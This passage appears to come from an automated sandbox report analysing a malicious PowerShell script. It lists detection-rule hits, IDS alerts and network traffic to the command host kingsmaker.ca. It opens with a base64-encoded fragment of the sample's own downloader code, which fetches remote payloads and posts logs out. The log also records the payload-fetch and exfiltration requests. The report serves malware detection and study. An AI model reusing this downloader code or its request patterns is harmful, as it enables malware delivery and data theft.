ACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7120, TargetFilename: C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", ProcessId: 7120, ProcessName: powershell.exe
        Source: Process startedAuthor: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 1276, ProcessName: sc.exe
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7580, ProcessName: svchost.exe

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7120, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline", ProcessId: 7112, ProcessName: csc.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-29T08:30:28.862289+010028032742Potentially Bad Traffic192.168.2.549706104.21.75.170443TCP
        2024-11-29T08:30:33.376992+010028032742Potentially Bad Traffic192.168.2.549708104.21.75.170443TCP
        2024-11-29T08:31:09.279675+010028032742Potentially Bad Traffic192.168.2.549797104.21.75.170443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: kingsmaker_4.ca.ps1Avira: detected
        Source: C:\Windows\Temp\svczHost.exeReversingLabs: Detection: 66%
        Source: kingsmaker_4.ca.ps1ReversingLabs: Detection: 15%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
        Source: unknownHTTPS traffic detected: 104.21.75.170:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.75.170:443 -> 192.168.2.5:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.75.170:443 -> 192.168.2.5:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49810 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49823 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49926 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49974 version: TLS 1.2
        Source: Binary string: ion.pdbp> source: powershell.exe, 00000005.00000002.2369835979.000001ABF3723000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: bb.pdb source: powershell.exe, 00000005.00000002.2369835979.000001ABF3723000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

        Networking

        barindex
        Source: powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmpString found in memory: <&nbsp;&nbsp;&nbsp;"><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>
        Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: kingsmaker.caConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 52.6.155.20 52.6.155.20
        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49797 -> 104.21.75.170:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 104.21.75.170:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 104.21.75.170:443
        Source: global trafficHTTP traffic detected: GET /file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/4/4/user/203 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6635a8c2001ae9b439940f2a4e27446bc2 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 302
        Source: global trafficHTTP traffic detected: GET /file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f7367 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66a2bd10c53ccb7e2954104e6af3dc2acc HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 302
        Source: global trafficHTTP traffic detected: GET /file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc1b0f9d6a14a3503e3e HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 85
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc1b0f9d6a14a3503e3e HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 86
        Source: global trafficHTTP traffic detected: GET /file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc1b0f9d6a14a3503e3e HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 62
        Source: global trafficHTTP traffic detected: GET /file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 140
        Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: 89d789c4-e7e5-4f75-95a4-57139ab6811fx-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
        Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 69
        Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 200
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 97
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caContent-Length: 64
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: global trafficHTTP traffic detected: GET /file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/4/4/user/203 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f7367 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=txFb4ztSLLEgxVe&MD=N4lU5e1w HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.caConnection: Keep-Alive
